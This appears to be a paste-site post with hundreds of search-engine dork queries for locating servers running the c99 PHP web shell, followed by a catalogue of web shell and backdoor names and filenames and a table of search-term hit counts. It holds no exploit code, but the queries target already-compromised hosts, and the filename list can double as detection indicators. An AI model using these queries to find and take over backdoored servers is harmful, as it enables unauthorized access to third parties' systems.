  1276. inurl:"c99.php" inurl:c99.php inurl:c99.php inurl:c99.php allinurl:c99.php inurl:"c99.php" inurl:c99.php intitle:c99shell uname c99shell v.1.0 (roots) inurl:/c99.php allinurl:.c99.php allinurl:.c99.php intitle:C99Shell allintitle:"C99Shell" allintitle:"C99Shell" c99.php ccteam.ru c99.php
  1277. intext:c99shell inurl:c99.php
  1278. !C99Shell v. 1.0 pre-release build #16!
  1279. intitle:c99shell filetype:php
  1280. intitle:c99shell filetype:php
  1281. inurl:c99.php
  1282. inurl:c99.php
  1283. inurl:c99.php
  1284. inurl:c99.php
  1285. inurl:c99.php
  1286. inurl:c99.php
  1287. inurl:c99.php
  1288. inurl:"/c99.php"
  1289. inurl:c99.php
  1290. inurl:"/c99.php"
  1291. inurl:"c99.php"
  1292. inurl:"c99.php"
  1293. inurl:"c99.php"
  1294. inurl:c99.php
  1295. inurl:c99.php
  1296. allinurl:c99.php
  1297. inurl:c99.php
  1298. inurl:c99.php
  1299. c99shell v. 1.0 pre-release build #5
  1300. inurl:c99.php
  1301. inurl:c99.php
  1302. c99.php v.
  1303. C99Shell
  1304. inurl:c99.php
  1305. inurl:c99.php
  1306. c99shell
  1307. c99shell
  1308. c99shell
  1309. allinurl:"c99.php"
  1310. "inurl:C99.php"
  1311. inurl:"c99.php"
  1312. inurl:"c99.php"
  1313. "inurl:c99.php" + "intext:safe"
  1314. inurl:c99.php
  1315. allinurl:c99.php
  1316. ext:php inurl:c99.php
  1317. inurl:"c99.php"
  1318. "inurl:/c99.php
  1319. --[ c99shell v. 1.0 pre-release build #12 powered by Captain Crunch Security Team
  1320. inurl:/c99.php
  1321. inurl:/c99.php
  1322. C99Shell v. 1.0 pre-release build #12
  1323. C99Shell v. 1.0 pre-release build #12
  1324. inurl:c99.php
  1325. inurl:c99.php?
  1326. c99.php
  1327. inurl:"/c99.php"
  1328. inurl:"/c99.php"
  1329. c99.php download
  1330. inurl:c99.php
  1331. inurl:c99.php
  1332. inurl:c99.php
  1333. (intitle:r57shell | intitle:c99shell) +uname
  1334. (intitle:r57shell | intitle:c99shell) +uname
  1335. allinurl:c99.php
  1336. "c99shell"
  1337. inurl:minimail c99
  1338. inurl:minimail c99
  1339. inurl:c99.php
  1340. !C99Shell v. 1.0 pre-release build # +php -htm -html -shtml
  1341. allintitle: c99shell filetype:php
  1342. inurl:/c99.php
  1343. inurl:c99.php
  1344. inurl:c99.php
  1345. inurl:c99.php
  1346. intitle:c99shell inurl:c99.php
  1347. inurl:c99.php uid=0(root)
  1348. inurl:c99.php
  1349. inurl:c99.php
  1350. inurl:c99.php uid=0(root)
  1351. inurl:c99.php
  1352. inurl:/files/c99.php
  1353. inurl:c99.php
  1354. inurl:"c99.php"
  1355. inurl:c99.php site:.fr
  1356. inurl:/files/c99.php
  1357. allinurl:c99.php
  1358. inurl:./c99.php
  1359. intitle:c99shell safe-mode:OFF
  1360. inurl:c99.php
  1361. c99.php "uid=0"
  1362. c99.php "uid=0"
  1363. c99.php "uid=0"
  1364. c99.php "uid=0"
  1365. inurl:c99.php
  1366. inurl:c99.php
  1367. powered by Captain Crunch Security Team
  1368. inurl:c99 filetype:php minimail
  1369. allinurl:c99.php
  1370. safe-mode: off (not secure) drwxrwxrwx c99shell
  1371. inurl:c99.php
  1372. inurl:c99.php uid=0(root)
  1373. root c99.php
  1374. "Captain Crunch Security Team" inurl:c99
  1375. download c99.php
  1376. download c99.php
  1377. download c99.php
  1378. inurl:c99.php
  1379. inurl:c99.php
  1380. allinurl: c99.php
  1381. inurl:c99.php
  1382. allinurl: c99.php
  1383. inurl:"/c99.php"
  1384. allinurl: c99.php
  1385. inurl:c99.php
  1386. inurl:"c99.php" c99shell
  1387. inurl:c99.php uid=0(root)
  1388. c99shell powered by admin
  1389. c99shell powered by admin
  1390. inurl:"/c99.php"
  1391. inurl:c99.php
  1392. inurl:c99.php
  1393. inurl:c99.php
  1394. c99 shell v.1.0 (roots)
  1395. inurl:c99.php
  1396. allintitle: "c99shell"
  1397. inurl:"c99.php
  1398. inurl:"c99.php
  1399. allinurl: "c99.php"
  1400. inurl:c99.php
  1401. intitle:C99Shell v. 1.0 pre-release +uname
  1402. intitle:C99Shell v. 1.0 pre-release +uname
  1403. allinurl: "c99.php"
  1404. inurl:c99.php
  1405. inurl:"c99.php"
  1406. inurl:"c99.php"
  1407. inurl:c99.php
  1408. inurl:c99.php
  1409. inurl:c99.php
  1410. inurl:c99.php
  1411. inurl:"c99.php" c99shell
  1412. inurl:c99.php
  1413. inurl:"c99.php"
  1414. allinurl:c99.php
  1415. inurl:"/c99.php
  1416. inurl:c99.php?
  1417. inurl:/c99.php+uname
  1418. allinurl:"c99.php"
  1419. allinurl:c99.php
  1420. inurl:"c99.php"
  1421. inurl:"c99.php"
  1422. allinurl:c99.php
  1423. allinurl:c99.php?
  1424. allinurl:c99.php?
  1425. allinurl:c99.php?
  1426. "inurl:c99..php"
  1427. allinurl:c99.php
  1428. c99shell [file on secure ok ]?
  1429. inurl:c99.php
  1430. inurl:c99.php
  1431. inurl:c99.php
  1432. inurl:c99.php
  1433. inurl:c99.php
  1434. inurl:c99.php
  1435. inurl:c99.php
  1436. inurl:c99.php
  1437. powered by Captain Crunch Security Team
  1438. allinurl:c99.php
  1439. "c99.php" filetype:php
  1440. allinurl:c99.php
  1441. inurl:c99.php
  1442. allinurl:.c99.php
  1443. "inurl:c99.php"
  1444. c99. PHP-code Feedback Self remove
  1445. allinurl:c99.php
  1446. download c99.php
  1447. allinurl:c99.php
  1448. inurl:c99.php
  1449. allinurl: "c99.php"
  1450. allinurl:c99.php
  1451. allinurl:c99.php
  1452. c99shell
  1453. inurl:c99.php
  1454. inurl:c99.php
  1455. intitle:C99Shell v. 1.0 pre-release +uname
  1456. allinurl:"c99.php"
  1457. inurl:c99.php
  1458. inurl:c99.php
  1459. inurl:c99.php
  1460. inurl:c99.php
  1461. safe-mode: off (not secure) drwxrwxrwx c99shell
  1462. inurl:/c99.php
  1463. inurl:"c99.php"
  1464. inurl:c99.php
  1465. inurl:c99.php
  1466. c99.php download
  1467. inurl:c99.php
  1468. inurl:"c99.php"
  1469. inurl:/c99.php
  1470. inurl:"c99.php?"
  1471. inurl:c99.php
  1472. inurl:c99.php
  1473. files/c99.php
  1474. c99shell filetype:php -echo
  1475. c99shell powered by admin
  1476. inurl:c99.php
  1477. inurl:c99.php
  1478. inurl:"c99.php"
  1479. inurl:c99.php uid=0(root)
  1480. allinurl:c99.php
  1481. inurl:"c99.php"
  1482. inurl:"c99.php"
  1483. inurl:"/c99.php" intitle:"C99shell"
  1484. inurl:"/c99.php" intitle:"C99shell"
  1485. inurl:"/c99.php" intitle:"C99shell"
  1486. C99Shell v. 1.0 pre-release build #5
  1487. inurl:c99.php
  1488. inurl:c99.php
  1489. --[ c99shell v. 1.0 pre-release build #16
  1490. c99shell linux infong
  1491. c99shell linux infong
  1492. C99Shell v. 1.0 pre-release build
  1493. !C99Shell v. 1.0 beta!
  1494. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1495. !c99shell v. 1+Safe-mode: OFF (not secure)
  1496. "C99Shell v. 1.0 pre-release build "
  1497. intitle:c99shell +filetype:php
  1498. inurl:c99.php
  1499. intitle:C99Shell v. 1.0 pre-release +uname
  1500. "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1501. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1502. intitle:!C99Shell v. 1.0 pre-release build #16! root
  1503. !C99Shell v. 1.0 pre-release build #5!
  1504. inurl:"c99.php"
  1505. C99Shell v. 1.0 pre-release build #16!
  1506. c99shell v. 1.0 pre-release build #16
  1507. intitle:c99shell intext:uname
  1508. allintext:C99Shell v. 1.0 pre-release build #12
  1509. c99shell v. 1.0 pre-release build #16
  1510. --[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
  1511. allinurl: "c99.php"
  1512. allinurl: "c99.php"
  1513. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1514. "c99shell v 1.0"
  1515. ftp apache inurl:c99.php
  1516. c99shell+v.+1.0 16
  1517. C99Shell v. 1.0 pre-release build #16 download
  1518. intitle:c99shell "Software: Apache"
  1519. allinurl: c99.php
  1520. allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1521. powered by Captain Crunch Security Team
  1522. powered by Captain Crunch Security Team
  1523. !C99Shell v. 1.0 pre-release build #5!
  1524. c99shell v. 1.0 release security
  1525. c99shell v. 1.0 pre-release build
  1526. inurl:c99.php
  1527. c99shell [file on secure ok ]?
  1528. C99Shell v. 1.3
  1529. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1530. inurl:c99.php uid=0(root)
  1531. powered by Captain Crunch Security Team
  1532. C99Shell v. 1.0 pre-release build #16
  1533. c99shell[on file]ok
  1534. c99shell[file on ]ok
  1535. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1536. inurl:c99.php
  1537. "C99Shell v. 1.0 pre"
  1538. =C99Shell v. 1.0 pre-release
  1539. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1540. c99shell v. pre-release build
  1541. inurl:c99.php c99 shell
  1542. inurl:c99.php c99 shell
  1543. powered by Captain Crunch Security Team
  1544. inurl:c99.php
  1545. inurl:c99.php
  1546. !C99Shell v. 1.0 pre-release build #5!
  1547. intitle:"c99shell" filetype:php root
  1548. intitle:"c99shell" Linux infong 2.4
  1549. C99Shell v. 1.0 beta !
  1550. C99Shell v. 1.0 pre-release build #
  1551. inurl:"c99.php"
  1552. allintext:C99Shell v. 1.0 pre-release build #12
  1553. "C99Shell v. 1.0 pre"
  1554. powered by Captain Crunch Security Team
  1555. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1556. inurl:/c99.php?
  1557. allinurl:c99.php
  1558. intitle:C99Shell pre-release
  1559. inurl:"c99.php"
  1560. powered by Captain Crunch Security Team
  1561. inurl:c99.php
  1562. C99Shell v. 1.0 pre-release build #16!
  1563. allinurl:c99.php
  1564. C99Shell v. 1.0 pre-release build #16 administrator
  1565. intitle:c99shell filetype:php
  1566. powered by Captain Crunch Security Team
  1567. powered by Captain Crunch Security Team
  1568. C99Shell v. 1.0 pre-release build #12
  1569. c99shell v.1.0
  1570. allinurl:c99.php
  1571. "c99shell v. 1.0 pre-release build"
  1572. inurl:"c99.php" filetype:php
  1573. "c99shell v. 1.0 "
  1574. ok c99.php
  1575. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1576. c99shell v. 1.0 pre-release build #16 |
  1577. !C99Shell v. 1.0 pre-release build #5!
  1578. !C99Shell v. 1.0 pre-release build #5!
  1579. allinurl:/c99.php
  1580. powered by Captain Crunch Security Team
  1581. inurl:c99.php
  1582. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1583. inurl:c99.php
  1584. powered by Captain Crunch Security Team
  1585. inurl:c99.php
  1586. C99Shell v. 1.0 pre-release
  1587. inurl:c99.php
  1588. inurl:c99.php ext:php
  1589. inurl:"c99.php"
  1590. allinurl:"c99.php"
  1591. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1592. powered by Captain Crunch Security Team
  1593. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1594. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
  1595. C99Shell v. 1.0 pre-release build #16 software apache
  1596. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1597. "c99shell v 1.0"
  1598. inurl:"c99.php"
  1599. allintitle: C99shell filetype:php
  1600. C99Shell v. 1.0 pre-release build #16!
  1601. "c99shell v. 1.0 pre-release"
  1602. c99shell v. 1.0 pre-release build #5
  1603. allinurl:"c99.php" filetype:php
  1604. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1605. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1606. !C99Shell v. 1.0 pre-release build #16!
  1607. inurl:c99.php
  1608. intitle:C99Shell v. 1.0 pre-release +uname
  1609. inurl:c99.php
  1610. c99shell v. 1.0
  1611. allinurl: c99.php
  1612. --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  1613. inurl:"/c99.php"
  1614. c99shell +uname
  1615. c99shell php + uname
  1616. c99shell php + uname
  1617. --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  1618. allinurl:c99.php
  1619. !C99Shell v. 1.0 pre-release build #5!
  1620. C99Shell v.1.0 pre-release
  1621. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1622. inurl:c99.php
  1623. intitle:c99shell filetype:php
  1624. "Encoder Tools Proc. FTP brute"
  1625. "c99" filetype:php intext:"Safe-Mode: OFF"
  1626. c99shell v. 1.0 pre
  1627. inurl:c99.php
  1628. intitle:c99shell uname -bbpress
  1629.  
  1630.  
  1631. ==============================================================
  1632.  
  1633.  
  1634.  
  1635. - C99madShell v. 2.0 madnet edition
  1636. - c99-safe-mode
  1637. - c99edit
  1638. - c99shell
  1639. - DownloaderToFTP
  1640. - GFS Web-Shell ver 4.0.0.0
  1641. - NetworkFileManager
  1642. - NiX Remote Web Shell&#8482;
  1643. - r57MySQL_FileViewer
  1644. - r57shell
  1645. - MySQLBackUpAll
  1646. - MySQLBackUpOnce
  1647. - Sql
  1648. - a_gedit
  1649. - Antichat
  1650. - bk
  1651. - c2007
  1652. - Casus15
  1653. - CmdAsp
  1654. - Csh
  1655. - Ctt_sh
  1656. - Cybershell
  1657. - DxShell
  1658. - gfs_sh
  1659. - grp-2018
  1660. - Hidshell
  1661. - iMHaPFtp
  1662. - Load_shell
  1663. - NFM
  1664. - NGH
  1665. - Nixrem
  1666. - NST
  1667. - Phvayvv
  1668. - Predator
  1669. - r0t
  1670. - Remview
  1671. - Zacosmall
  1672. - Rashell v.1.31
  1673. - Xoce 1.5
  1674. - Xoce 1.7
  1675. - img
  1676. - mailer3
  1677. - myshell
  1678. - mysql_tool
  1679. - mysql
  1680. - network
  1681. - nshell
  1682. - ru24_post_sh
  1683. - pHpINJ
  1684. - PHP Shell
  1685. - Pws
  1686. - KA_uShell
  1687. - Sincap
  1688. - telnet
  1689. - telnetd
  1690. - smtpd.py
  1691. - xinfo
  1692. - CyberSpy5.Asp
  1693. - Indexer.asp
  1694. - Klasvayv.asp
  1695. - NTdaddy.asp
  1696. - Reader.asp
  1697. - RemExp.asp
  1698. - Zehir4.asp
  1699. - Ajan.asp
  1700. - EFSO_2.asp
  1701. - Elmali Seker.asp
  1702. - Server Variables.asp
  1703. - Tool.asp
  1704. - WebShell.pl
  1705. - PHP Backdoor Connect.pl
  1706. - perlbot.pl
  1707. - shellbot.pl
  1708. - r57pws.pl
  1709. - lurm_safemod_on.pl
  1710. - Asmodeus v0.1.pl
  1711. - connectback2.pl
  1712. - Java Shell.js
  1713. - Phyton Shell.py
  1714. - cgi-python.py
  1715.  
  1716. [ &#1057;
  1717.  
  1718. ==============================================================
  1719.  
  1720. Ajan.asp
  1721. Asmodeus v0.1.pl
  1722. backup.php
  1723. backupsql.php
  1724. Blind Shell.cpp
  1725. c2007.php
  1726. c99.php
  1727. c99shell.php
  1728. Casus15.php
  1729. cgi-python.py
  1730. CMD.asp
  1731. CmdAsp.asp
  1732. connectback2.pl
  1733. ctt_sh.php
  1734. CyberEye.asp
  1735. cybershell.php
  1736. CyberSpy5.Asp
  1737. Dx.php
  1738. DxShell_hk.php
  1739. EFSO_2.asp
  1740. Elmali Seker.asp
  1741. elmaliseker.asp
  1742. gfs_sh.php
  1743. img.php
  1744. iMHaPFtp.php
  1745. Inderxer.asp
  1746. indexer.asp
  1747. Java Shell.js
  1748. Klasvayv.asp
  1749. load_shell.php
  1750. lurm_safemod_on.cgi
  1751. mailer3.php
  1752. myshell.php
  1753. mysql.php
  1754. mysql_tool.php
  1755. network.php
  1756. Nshell (1).php
  1757. nshell.php
  1758. nstview.php
  1759. NT Addy.asp
  1760. ntdaddy.asp
  1761. perlbot.pl
  1762. PH Vayv.php
  1763. PHP Backdoor Connect.pl
  1764. PHP Shell.php
  1765. pHpINJ.php
  1766. phpshell.php
  1767. phvayv.php
  1768. Phyton Shell.py
  1769. pws.php
  1770. r57 Shell.php
  1771. r57pws.pl
  1772. r57shell.php
  1773. Rader.asp
  1774. reader.asp
  1775. Rem Exp.asp
  1776. Rem View.php
  1777. RemExp.asp
  1778. remview.php
  1779. ru24_post_sh.php
  1780. Russian.php
  1781. s.php
  1782. Server Variables.asp
  1783. shell.php
  1784. shellbot.pl
  1785. Sincap.php
  1786. smtpd.py
  1787. telnet.cgi
  1788. telnet.pl
  1789. telnetd.pl
  1790. Test.php
  1791. Tool.asp
  1792. Uploader.php
  1793. WebShell.cgi
  1794. xinfo.php
  1795. zacosmall.php
  1796. Zehir 4.asp
  1797. zehir4.asp
  1798.  
  1799. ==============================================================
  1800.  
  1801.        Hits      Search String
  1802. ----------------  ----------------------
  1803.  
  1804. 33        28.45%  powered by captain crunch security team
  1805. 6          5.17%  safe-mode: off (not secure)
  1806. 5          4.31%  home
  1807. 4          3.45%  basel 2.2
  1808. 4          3.45%  safe-mode: off (not secure) drwxrwxrwx
  1809. 3          2.59%  c99memoryl
  1810. 3          2.59%  c99shell [file on secure ok ]
  1811. 3          2.59%  c99shell v. 1.0 pre-release build #16
  1812. 3          2.59%  hacker
  1813. 3          2.59%  uid=99(nobody) gid=99(nobody) groups=99(nobody)
  1814. 2          1.72%  --[ c99shell v. 1.0 pre-release build #16
  1815. 2          1.72%  basel
  1816. 2          1.72%  c99shell v. 1.0 pre-release build
  1817. 2          1.72%  powered by captain crunch security team | http://ccteam.ru |
  1818. 2          1.72%  safe-mode : off ( not secured ) drwxrwxrwx
  1819. 2          1.72%  safe-mode: off (not secure) drwxrwxrwx c99shell
  1820. 1          0.86%  !c99shell v. 1.0 pre-release build #16!
  1821. 1          0.86%  --[ c99shell v. 1.0 pre-release build
  1822. 1          0.86%  -[ c99shell v. 1.0 pre-release build #16 powered by captain cru
  1823. 1          0.86%  /opt/zope/lib/python/zdaemon/zdrun.py
  1824. 1          0.86%  allintext:â&#8364;&#65533;safe-mode: off (not secure)â&#8364;&#65533;
  1825. 1          0.86%  allinurl:selfremove
  1826. 1          0.86%  basel documentation
  1827. 1          0.86%  c99memory.php
  1828. 1          0.86%  c99shell safe-mode : off ( not secured ) drwxrwxrwx
  1829. 1          0.86%  c99shell v. 1.0 pre-release build #16 powered by captain crunch
  1830. 1          0.86%  c99shell v. 1.0 pre-release uname
  1831. 1          0.86%  c99shell v. pre-release build
  1832. 1          0.86%  captain crunch security team
  1833. 1          0.86%  code safe-mode: off (not secure) drwxrwxrwx c99shell
  1834. 1          0.86%  drwxrwxrwx c99shell filetype:php
  1835. 1          0.86%  encoder bind proc. ftp brute sec. sql php-code feedback self re
  1836. 1          0.86%  encoder tools proc. ftp brute sec. sql php-code update feedback
  1837. 1          0.86%  home updir search buffer tools proc ftp brute sec sql self remo
  1838. 1          0.86%  how to restore using !c99memory v. 1.0 pre-release build #16!
  1839. 1          0.86%  intext:c99memory v. 1.0
  1840. 1          0.86%  intext:safe-mode: off (not secure)
  1841. 1          0.86%  intext:safe-mode: off (not secure) tooling
  1842. 1          0.86%  inurl:act=sql
  1843. 1          0.86%  name asc. size · modify · owner/group · perms action
  1844. 1          0.86%  php safe-mode drwxrwxrwx
  1845. 1          0.86%  php4 timezone database
  1846. 1          0.86%  powered by captain crunch security team drwxrwxrwx
  1847. 1          0.86%  powered by captain crunch security team | http://ccteam.ru
  1848. 1          0.86%  safe mode: off ( not secure )
  1849. 1          0.86%  safe mode: off (not secure)
  1850. 1          0.86%  safe-mode: off (not secure) / tmp/ drwxrwxrwx
  1851. 1          0.86%  safe-mode: off (not secure) site:pt
  1852. 1          0.86%  shell powered by captain crunch security team
  1853. 1          0.86%  site:www.astro.mat.uc.pt basel
  1854. 1          0.86%  uid= gid= groups= sql uname -a
  1855. 1          0.86%  uid=99 ( nobody ) gid=99 ( nobody )
  1856. 1          0.86%  uid=99(nobody) gid=99(nobody) groups=99(nobody)safe-mode: off (
  1857.  
  1858. now finish     "bbbbbbb bay"     good lock          www.saudihack.com
  1859.  
  1860.                     p o w e r  b y      ,,,,,...maxhex,,,,,...
Submit a correction or amendment below. [ previous version ] | [ difference ] | Make A New Post
To highlight particular lines, prefix each line with @@
Syntax highlighting:
Post expiration:
Post exposure:
Name / Title:
Email: